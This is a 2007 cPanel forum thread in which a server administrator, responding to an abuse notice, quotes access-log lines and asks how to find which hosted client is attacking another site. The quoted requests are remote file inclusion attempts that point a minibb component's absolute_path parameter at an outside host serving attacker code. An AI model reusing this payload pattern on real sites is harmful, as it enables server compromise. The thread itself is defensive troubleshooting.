Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

HELP - Need help identifying what user is doing something

Discussion in 'General Discussion' started by n000b, May 30, 2007.

  1. n000b

    n000b Well-Known Member

    Joined:
    Apr 7, 2005
    Messages:
    142
    Likes Received:
    0
    Trophy Points:
    166
    Hi,

    My dedicated server provider just sent me a policy enforcement notice, apparently someone on my server is trying to hack/crack another website. They sent me this:
    <my ip> - - [30/May/2007:14:12:14 +0200] "GET /~goober/n0h4x0rz/components/minibb/index.php?absolute_path=http://letashop.net/onfokh.gif? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"

    <my ip> - - [30/May/2007:14:12:29 +0200] "GET /~goober/n0h4x0rz/components/com_minibb.php?absolute_path=http://letashop.net/onfokh.gif? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"

    <my ip> - - [30/May/2007:14:12:43 +0200] "GET /~goober/n0h4x0rz/components/minibb/index.php?absolute_path=http://letashop.net/onfokh.gif? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
    <my ip> - - [30/May/2007:14:15:08 +0200] "GET /~goober/n0h4x0rz/components/minibb/index.php?absolute_path=http://letashop.net/onfokh.gif? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"


    They are from the server that is being hacked/cracked.


    How/where do I look to find out who is doing this on my server?

    Thanks :)
     
  2. approx

    approx Well-Known Member

    Joined:
    Mar 6, 2007
    Messages:
    59
    Likes Received:
    0
    Trophy Points:
    156
    1 of your client is cracked. tell them to update the patch of the software that he used. Don't you install mod_security?
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. n000b

    n000b Well-Known Member

    Joined:
    Apr 7, 2005
    Messages:
    142
    Likes Received:
    0
    Trophy Points:
    166
    Hi,

    Thanks, I know one of the clients has been cracked - I'm trying to figure out which client! :)

    Edit: would the server even keep logs of outgoing requests? I'm completely lost on how to track this issue!
     
    #3 n000b, May 31, 2007
    Last edited: May 31, 2007
  4. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    4
    Trophy Points:
    193
    Location:
    Minneapolis, MN
    This can be easily accomplished by using a program or a script to scan your server and report vulnerable scripts. We have our own; this thread might help: http://forums.cpanel.net/showthread.php?t=62821
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice